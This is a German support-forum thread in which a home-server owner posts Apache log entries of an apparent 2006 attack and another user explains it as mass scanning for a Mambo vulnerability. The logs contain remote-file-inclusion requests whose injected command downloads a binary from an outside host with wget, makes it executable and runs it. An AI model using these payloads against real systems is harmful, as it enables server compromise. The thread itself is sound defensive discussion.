Apache Friends Support Forum

[Anime]

Hallo und einen lieben....


Ich bin gerade ein bissle auf dem Schlauch und zwar folgendes: Irgendwer oder was versucht seit einger Zeit meinen Server zu häcken das mich jetzt dazu veranlassen lies seit gestern die Verbindung zu Dynalias zu kappen.

Sprich wenn ich mich ins Netzt einwähle dann aktualisiert sich nicht meine Dyndomäne und folglich erfahrt auch niemand meine Aktuelle Ip.

Ich hoffe das mein Verständnis soweit bis jetzt richtig ist.

Heute aber sah ich wieder jemanden bei mir herum schwirren mit folgender Log Eintragung und kann mir aber nicht erklären wie er nun meinen Rechner finden konnte.
Habt ihr vielleicht eine Erklärung dafür?

Code: Select all

203.109.147.171 - - [08/Jun/2006:16:32:52 +0200] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:32:54 +0200] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 200 18527
203.109.147.171 - - [08/Jun/2006:16:32:55 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:32:56 +0200] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:32:58 +0200] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:32:59 +0200] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:33:01 +0200] "POST /xmlrpc.php HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:33:02 +0200] "POST /blog/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:03 +0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:05 +0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:06 +0200] "POST /drupal/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:08 +0200] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:09 +0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:10 +0200] "POST /xmlrpc.php HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:33:12 +0200] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:13 +0200] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 -


[deepsurfer]

Seit zwei Tagen sind ScriptKiddis unterwegs die alle möglichen Server über eine MAMBOO Sicherheitslücke angreifen.

Also zuerst bei Mamboo vorbeischaun ob schon ein Patch da ist.

Das dich Leute auch ohne DynDNS finden hängt schlicht und ergreifend daran das deine IP als solches im Internet bekannt ist.

Es gibt scripte die einfach IPranges abgrasen und sobald sich dort etwas meldet wird der angriff gestartet.


Desweiteren kann es sogar sein das derjenige der die IP vor dir hatte auch einen Mambo laufen lies und du jetzt nur einen veraltetetn Request aus dem Internet bekommst. daher auch die 400